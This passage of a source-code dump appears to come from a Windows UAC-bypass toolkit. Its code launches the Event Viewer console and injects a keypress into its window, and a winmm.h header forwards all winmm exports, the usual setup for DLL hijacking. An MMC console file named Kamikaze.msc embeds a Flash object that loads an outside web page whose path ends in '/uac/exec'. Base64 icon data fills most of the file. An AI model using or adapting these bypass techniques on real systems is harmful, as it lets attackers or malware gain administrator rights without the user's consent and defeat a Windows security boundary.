    shinfo.lpParameters = EVENTVWR_MSC;
    shinfo.nShow = SW_SHOW;

    if (ShellExecuteEx(&shinfo)) {

        do {
            hwnd = FindWindow(L"MMCMainFrame", NULL);
            if (hwnd)
                break;
            else {
                Sleep(1000);
            }
        } while (--iRetry);

        if (hwnd) {

            SetForegroundWindow(hwnd);

            ip.type = INPUT_KEYBOARD;
            ip.ki.wScan = 0;
            ip.ki.time = 0;
            ip.ki.dwExtraInfo = 0;
            ip.ki.dwFlags = 0;
            ip.ki.wVk = VK_F1;
            ucmxSendInput(1, &ip, sizeof(INPUT));

            Sleep(1000);
        }
        else {
            ucmDbgMsg(L"MMCMainFrame window not found\r\n");
        }

        TerminateProcess(shinfo.hProcess, 0);
        CloseHandle(shinfo.hProcess);
    }
}

================================================
FILE: Source/Fubuki/uihacks.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2019 - 2024
*
*  TITLE:       UIHACKS.H
*
*  VERSION:     3.66
*
*  DATE:        03 Apr 2024
*
*  Fubuki UIAccess related code header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once

typedef struct _SEARCH_WND {
    HWND hWnd;
    ULONG ProcessId;
} SEARCH_WND, *PSEARCH_WND;

VOID ucmUIHackExecute(
    _In_ LPWSTR lpPayload);

VOID ucmUIHackExecute2(
    VOID);

================================================
FILE: Source/Fubuki/winmm.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2018
*
*  TITLE:       WINMM.H
*
*  VERSION:     3.04
*
*  DATE:        10 Nov 2018
*
*  WINMM forwarded import.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once

#pragma comment(linker, " /EXPORT:timeBeginPeriod=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeBeginPeriod")
#pragma comment(linker, " /EXPORT:timeEndPeriod=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeEndPeriod")
#pragma comment(linker, " /EXPORT:waveOutGetNumDevs=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetNumDevs")
#pragma comment(linker, " /EXPORT:midiInMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiInMessage")
#pragma comment(linker, " /EXPORT:midiOutGetErrorTextW=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutGetErrorTextW")
#pragma comment(linker, " /EXPORT:midiOutGetNumDevs=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutGetNumDevs")
#pragma comment(linker, " /EXPORT:midiOutMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutMessage")
#pragma comment(linker, " /EXPORT:midiOutPrepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutPrepareHeader")
#pragma comment(linker, " /EXPORT:midiOutReset=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutReset")
#pragma comment(linker, " /EXPORT:midiOutUnprepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiOutUnprepareHeader")
#pragma comment(linker, " /EXPORT:midiStreamClose=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamClose")
#pragma comment(linker, " /EXPORT:midiStreamOpen=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamOpen")
#pragma comment(linker, " /EXPORT:midiStreamOut=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamOut")
#pragma comment(linker, " /EXPORT:midiStreamPause=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamPause")
#pragma comment(linker, " /EXPORT:midiStreamPosition=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamPosition")
#pragma comment(linker, " /EXPORT:midiStreamProperty=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamProperty")
#pragma comment(linker, " /EXPORT:midiStreamRestart=\\\\?\\globalroot\\systemroot\\system32\\winmm.midiStreamRestart")
#pragma comment(linker, " /EXPORT:mixerGetControlDetailsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetControlDetailsW")
#pragma comment(linker, " /EXPORT:mixerGetDevCapsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetDevCapsW")
#pragma comment(linker, " /EXPORT:mixerGetLineControlsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetLineControlsW")
#pragma comment(linker, " /EXPORT:mixerGetLineInfoW=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetLineInfoW")
#pragma comment(linker, " /EXPORT:mixerGetNumDevs=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerGetNumDevs")
#pragma comment(linker, " /EXPORT:mixerSetControlDetails=\\\\?\\globalroot\\systemroot\\system32\\winmm.mixerSetControlDetails")
#pragma comment(linker, " /EXPORT:PlaySoundW=\\\\?\\globalroot\\systemroot\\system32\\winmm.PlaySoundW")
#pragma comment(linker, " /EXPORT:timeGetDevCaps=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeGetDevCaps")
#pragma comment(linker, " /EXPORT:timeGetTime=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeGetTime")
#pragma comment(linker, " /EXPORT:timeKillEvent=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeKillEvent")
#pragma comment(linker, " /EXPORT:timeSetEvent=\\\\?\\globalroot\\systemroot\\system32\\winmm.timeSetEvent")
#pragma comment(linker, " /EXPORT:waveInMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveInMessage")
#pragma comment(linker, " /EXPORT:waveOutClose=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutClose")
#pragma comment(linker, " /EXPORT:waveOutGetDevCapsW=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetDevCapsW")
#pragma comment(linker, " /EXPORT:waveOutGetErrorTextW=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetErrorTextW")
#pragma comment(linker, " /EXPORT:waveOutGetPosition=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetPosition")
#pragma comment(linker, " /EXPORT:waveOutGetVolume=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutGetVolume")
#pragma comment(linker, " /EXPORT:waveOutMessage=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutMessage")
#pragma comment(linker, " /EXPORT:waveOutOpen=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutOpen")
#pragma comment(linker, " /EXPORT:waveOutPause=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutPause")
#pragma comment(linker, " /EXPORT:waveOutPrepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutPrepareHeader")
#pragma comment(linker, " /EXPORT:waveOutReset=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutReset")
#pragma comment(linker, " /EXPORT:waveOutRestart=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutRestart")
#pragma comment(linker, " /EXPORT:waveOutSetVolume=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutSetVolume")
#pragma comment(linker, " /EXPORT:waveOutUnprepareHeader=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutUnprepareHeader")
#pragma comment(linker, " /EXPORT:waveOutWrite=\\\\?\\globalroot\\systemroot\\system32\\winmm.waveOutWrite")

================================================
FILE: Source/Kamikaze/Kamikaze.msc
================================================
(MMC console file; the XML markup was stripped in extraction, only the text nodes survive)
{D0918FB2-FDF5-4A21-A323-32DC7F4D67FE}
{C96401CF-0E17-11D3-885B-00C04F72C717}
{C96401CF-0E17-11D3-885B-00C04F72C717}
{C96401CC-0E17-11D3-885B-00C04F72C717}
{00000000-0000-0000-0000-000000000000}
{00000000-0000-0000-0000-000000000000}
{71E5B33E-1064-11D2-808F-0000F875A9CE}
Favorites
Shockwave Flash Object
https://hfiref0x.github.io/Beacon/uac/exec
Console Root
(base64-encoded icon bitmap data omitted)
///k2v/+2cz/oaOk/8jExP/Py8v5rKyr/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMnHx//V0tH/0c3N /9HNzf/Qzcz/0MzM/8bGxv+VlJT/zsvJ/83Jyf+5vsD/rQkG/8kSAv/mDwL//GpQ//7TvP/+y7L/ /sqv//u8oP+kqKj/ycTE/8/Ly/murKz/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAy8nJ/9bS0v/Szs7/ 0c7N/8TGxv++wsP/s7e3/5WYmP+go6P/r6+v/7m+wP+5vsD/ub7A/7i9vv+1u73/tLi5/7C1tv+u s7T/q6+w/6isrP/JxcT/z8zL+a+urv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADNy8v/1tTU/9TR0P/S 0ND/09DQ/9TT0/+4vL3/j5GR/7+9vf/Kx8b/zsvL/87Ly//Ny8n/zcnJ/83Jyf/MyMj/zMjI/8vI x//Lx8f/y8fH/8vHxf/QzMz5r6+v/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAM7NzP/Y1dX/q66w/6is rP+lqKn/oqSl/56hof+bnZ7/mZqa/5aYmP+TlZX/kZKS/87Ly//Oy8v/zcvJ/83Jyf/Mycj/zMnI /8zIyP/LyMf/y8fH/9DMzPmwr6//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAkJCQ9JSUmAenp62nV1ddo+Pj6ABwcHDwAAAAAAAAAA0c7O/9rW1v+us7T/jRYV /40SDv+MDgz/nA4M/7cvHf/ESDT/yUcy/8RIMP+UlZX/0MzM/87My//Oy8v/zsvL/83Lyf/Nycn/ zcnI/8zJyP/LyMf/0c3N+bCwsP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAATk5Ofqmpqf+2trb/tbW1/5ubm/89PT1+AAAAAAAAAADS0dD/2tjY/7K1t/+aJx7/ mSAU/58PAP+uEQD/zE05/+B3Zf/od2T/3WtR/5eZmf/Rzc3/0M3M/9DMzP/QzMv/zsvL/87Ly//N y8n/zcnJ/8zJyP/Rzc35srCw/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAACQkJDcvb29/729vf+5ubn/sLCw/4qKiv+VlJT/lZSU/9XS0v/c2tr/tbm7/6ZCOP+f HhL/rBEA/78ZA//ieGb/8aCS//eejf/zlIH/mpuc/9LOzv/Rzc3/0c3N/9DNzP/QzMz/zszL/87L y//Ny8v/zcnJ/9HPz/mzsrL/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAJeXl9zX19f/0dHR/8XFxf+5ubn/lZST/8a9vP/Gvbz/1tTU/97c3P+2vL3/qDkw/6gV Bf/AFQD/2CkN//ajk//8vrH//r2u//23pf+dn6D/0tDQ/9LQzv/Rzs7/0c7N/9HNzf/Qzcz/0MzM /87My//Oy8v/09DQ+bOzsv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAVFRUfsrKyv/i4uL/1tbW/7Gxsf9GRkZ+AAAAAAAAAADY1dX/4N7d/7i+wP+oGAv/uxkA /9caAP/xSzL//9XM///e1f//5Nr//tnM/6GjpP/U0dH/1NHQ/9LQ0P/S0M7/0c7N/9HNzf/Rzc3/ 0M3M/87My//T0ND5tLOz/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAKCgoPVlZWgJeXl9qRkZHaTU1NgAgICA8AAAAAAAAAANrY1v/h4OD/ub7A/60JBv/JEgL/ 5g8C//xqUP/+07z//suy//7Kr//7vKD/pKio/9XS0v/V0tH/1NHR/9TR0P/S0ND/0tDO/9HOzv/R zc3/0M3M/9TR0Pm0s7P/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3drZ/+Ti4v+5vsD/ub7A/7m+wP+4 vb7/tbu9/7S4uf+wtbb/rrO0/6uvsP+orKz/2NbV/9jV1P/W1NT/1dLS/9XS0v/V0tH/1NHR/9LQ 0P/Szs7/1dPT+ba0tP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADg3dz/6unp/+fn5//n5ub/5+bm/+bl 5v/m5eX/5eTl/+Xk5P/l4uL/5OLi/+Th4f/i4eH/4uDg/+Hg4P/h3t7/4N3e/+Dd3f/e3Nz/3trc /93a2v/g3d3/trS0/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODd3f/e3Nr/3drZ/9zZ2P/a2Nb/2NbV /9bU1P/V0tL/0tHQ/9HOzv/Ozc3/zcvL/8vJyf/Jx8f/x8XF/8XDw//DwcD/wL+//729vP+8u7v/ ubi4/7i3t/+2tLT/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAJWUlP/Gvbz/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAlZSU/8a9vP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 